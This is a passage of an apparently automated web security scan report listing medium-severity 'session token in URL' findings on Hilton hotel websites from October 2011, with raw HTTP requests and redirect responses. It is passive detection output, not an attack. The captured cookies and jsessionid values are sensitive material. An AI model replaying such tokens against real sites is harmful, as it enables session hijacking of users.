Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; NSC_qse-qgt=44153d5f3660; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.996; mmid=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635640479:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 12:53:40 GMT
Content-Length: 84951
Connection: close
Vary: Accept-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:04:40 GMT;path=/


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta
...[SNIP]...
<li>


<a href="http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do;jsessionid=89A82514A002A1CE9413C2D5351C2762.etc33?opTitle=hotel_primary_nav_dining&cid=OH,HH,boslh,Dining_Menu_ConnollysF" title="" target="_blank" class="">Lift your spirits at Connolly's</a>
...[SNIP]...

9.24. http://www1.hilton.com/en_US/hi/index.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /en_US/hi/index.do

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/hi/index.do HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 59059
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:52:41 GMT
Connection: close
Set-Cookie: JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; Path=/
Set-Cookie: BetaCookie=Y; Domain=.hilton.com; Expires=Tue, 04-Oct-2011 12:52:41 GMT; Path=/en_US
Set-Cookie: BetaCookie=Y; Domain=.hilton.com; Expires=Tue, 04-Oct-2011 12:52:41 GMT; Path=/en
Set-Cookie: cross-sell=hi; Domain=hilton.com; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:03:41 GMT;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="msapplication-st
...[SNIP]...
<td>
           
               
                                                                                                                                       <a href="/en_US/hi/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13" title="Hilton Hotels Home Page" tabindex="3">
                           <img src="/en_US/hi/media/images/logos/logo.gif" border="0" />
...[SNIP]...


           
                                                                                                                                                                           <a href="/doxch.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?dst=http://GW-HI/en_US/hi/search/findhotels/index.htm&it=Tnav,Res">
       Reservations
   </a>
...[SNIP]...

                       
                       
                                                                                                                                                                                       <a href="/en_US/hh/home_index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?it=Tnav,HHonors">
       Hilton HHonors
   </a>
...[SNIP]...
<li class="brandBarLi brandBarLi_CH" id="brandBarLi_CH"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_CH');" onmouseout="turnOffPopup('brandBarLi_CH');" href="/en/ch/home.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HI" id="brandBarLi_HI"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_HI');" onmouseout="turnOffPopup('brandBarLi_HI');" href="/en_US/hi/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_DT" id="brandBarLi_DT"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_DT');" onmouseout="turnOffPopup('brandBarLi_DT');" href="/en_US/dt/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_ES" id="brandBarLi_ES"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_ES');" onmouseout="turnOffPopup('brandBarLi_ES');" href="/en_US/es/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_GI" id="brandBarLi_GI"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_GI');" onmouseout="turnOffPopup('brandBarLi_GI');" href="/en_US/gi/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HP" id="brandBarLi_HP"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_HP');" onmouseout="turnOffPopup('brandBarLi_HP');" href="/en_US/hp/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HW" id="brandBarLi_HW"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_HW');" onmouseout="turnOffPopup('brandBarLi_HW');" href="/en_US/hw/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HT" id="brandBarLi_HT"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_HT');" onmouseout="turnOffPopup('brandBarLi_HT');" href="/en_US/ht/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_WW" id="brandBarLi_WW"><a class="brandBarLiA" href="/en_US/hh/home_index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13"><span>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="/en_US/hi/customersupport/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13">
                                                       Customer Support
                                                   </a>
...[SNIP]...
<li>
                           
                           
                                                       <a href="/en_US/ww/customersupport/privacy-policy.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13" rel="nofollow" class="linkPrivacyPolicy">
                               Privacy Policy (Updated Sep 2011)
                           </a>
...[SNIP]...
<li>
                           
                           
                                                       <a href="/en_US/hi/customersupport/site-usage.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13" rel="nofollow">
                               Site Usage Agreement
                           </a>
...[SNIP]...
<li><a href="/es/hi/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13">Espa..ol</a>
...[SNIP]...
<li><a href="/fr/hi/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13">Fran..ais</a>
...[SNIP]...

9.25. http://www1.hilton.com/en_US/hi/sitemap/index.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /en_US/hi/sitemap/index.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /en_US/hi/sitemap/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:04:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=1907DCB21C07B2421366C003D9FC39EA.etc62; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:15:10 GMT;path=/
Content-Length: 37911


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="m
...[SNIP]...

9.26. http://www3.hilton.com/en_US/ch/doxch.htm

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/ch/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/ch/doxch.htm?dst=http://PFS-CH/en/ch/home.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://conradhotels1.hilton.com/en/ch/home.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801158,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:02:07 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:02:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 587

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://conradhotels1.hilton.com/en/ch/home.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801158,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://conradhotels1.hilton.com/en/ch/home.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801158,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;</a>
...[SNIP]...

9.27. http://www3.hilton.com/en_US/dt/doxch.htm

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/dt/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/dt/doxch.htm?dst=http://PFS-DT/en_US/dt/hotel/BOSCODT/index.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://doubletree1.hilton.com/en_US/dt/hotel/BOSCODT/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800734,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:01:51 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:02:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 619

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://doubletree1.hilton.com/en_US/dt/hotel/BOSCODT/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800734,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://doubletree1.hilton.com/en_US/dt/hotel/BOSCODT/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800734,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646
...[SNIP]...

9.28. http://www3.hilton.com/en_US/es/doxch.htm

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/es/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/es/doxch.htm?dst=http://PFS-ES/en_US/es/hotel/BOSAPES/index.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://embassysuites1.hilton.com/en_US/es/hotel/BOSAPES/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800460,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:01:41 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:01:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 625

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://embassysuites1.hilton.com/en_US/es/hotel/BOSAPES/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800460,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://embassysuites1.hilton.com/en_US/es/hotel/BOSAPES/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800460,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317
...[SNIP]...

9.29. http://www3.hilton.com/en_US/gi/doxch.htm

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/gi/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/gi/doxch.htm?dst=http://PFS-GI/en_US/gi/index.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://hiltongardeninn1.hilton.com/en_US/gi/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801260,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:02:10 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:02:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 601

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://hiltongardeninn1.hilton.com/en_US/gi/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801260,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://hiltongardeninn1.hilton.com/en_US/gi/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801260,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&am
...[SNIP]...

9.30. http://www3.hilton.com/en_US/hh/doxch.htm

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/hh/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/hh/doxch.htm?dst=http://PFS-HH/en_US/hh/home_index.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://hhonors1.hilton.com/en_US/hh/home_index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800177,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:01:31 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:01:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 595

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://hhonors1.hilton.com/en_US/hh/home_index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800177,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://hhonors1.hilton.com/en_US/hh/home_index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800177,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;<
...[SNIP]...

9.31. http://www3.hilton.com/en_US/hi/doxch.htm

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/hi/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/hi/doxch.htm?dst=http://PFS-HI/en_US/hi/hotel/BOSLHHH/index.do HTTP/1.1
Host: www3.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/results.htm?view=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.996; mmid=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635640479:ss=1317635584777

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789623,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 12:53:29 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 12:53:39 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 605

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789623,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789623,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
...[SNIP]...

9.32. http://www3.hilton.com/en_US/hp/doxch.htm

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/hp/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/hp/doxch.htm?dst=http://PFS-HP/en_US/hp/index.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://hamptoninn1.hilton.com/en_US/hp/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800600,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:01:47 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:01:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 591

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://hamptoninn1.hilton.com/en_US/hp/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800600,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://hamptoninn1.hilton.com/en_US/hp/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800600,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;</a
...[SNIP]...

9.33. http://www3.hilton.com/en_US/ht/doxch.htm

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/ht/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/ht/doxch.htm?dst=http://PFS-HT/en_US/ht/index.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://home2suites1.hilton.com/en_US/ht/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801354,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:02:14 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:02:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 593

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://home2suites1.hilton.com/en_US/ht/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801354,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://home2suites1.hilton.com/en_US/ht/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801354,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;</
...[SNIP]...

9.34. http://www3.hilton.com/en_US/hw/doxch.htm

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/hw/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/hw/doxch.htm?dst=http://PFS-HW/en_US/hw/hotel/BOSARHW/index.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://homewoodsuites1.hilton.com/en_US/hw/hotel/BOSARHW/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800879,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:01:57 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:02:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 627

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://homewoodsuites1.hilton.com/en_US/hw/hotel/BOSARHW/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800879,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://homewoodsuites1.hilton.com/en_US/hw/hotel/BOSARHW/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800879,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!131
...[SNIP]...

9.35. http://www3.hilton.com/en_US/wa/doxch.htm

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/wa/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/wa/doxch.htm?dst=http://PFS-WA/ HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://waldorfastoria.com/;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801034,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:02:02 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:02:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 549

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://waldorfastoria.com/&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801034,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://waldorfastoria.com/&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801034,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;</a>
...[SNIP]...

9.36. http://www3.hilton.com/es/hi/doxch.htm

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /es/hi/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /es/hi/doxch.htm?dst=http://PFS-HI/es/hi/index.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://www1.hilton.com/es/hi/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801562,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:02:21 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:02:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 571

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www1.hilton.com/es/hi/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801562,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://www1.hilton.com/es/hi/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801562,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;</a>
...[SNIP]...

9.37. http://www3.hilton.com/fr/hi/doxch.htm

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /fr/hi/doxch.htm

Issue detail

The response contains a link that appears to contain a session token: the jsessionid path parameter is carried in the Location header of the 302 below and repeated in the anchor in the response body.

Request

GET /fr/hi/doxch.htm?dst=http://PFS-HI/fr/hi/index.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
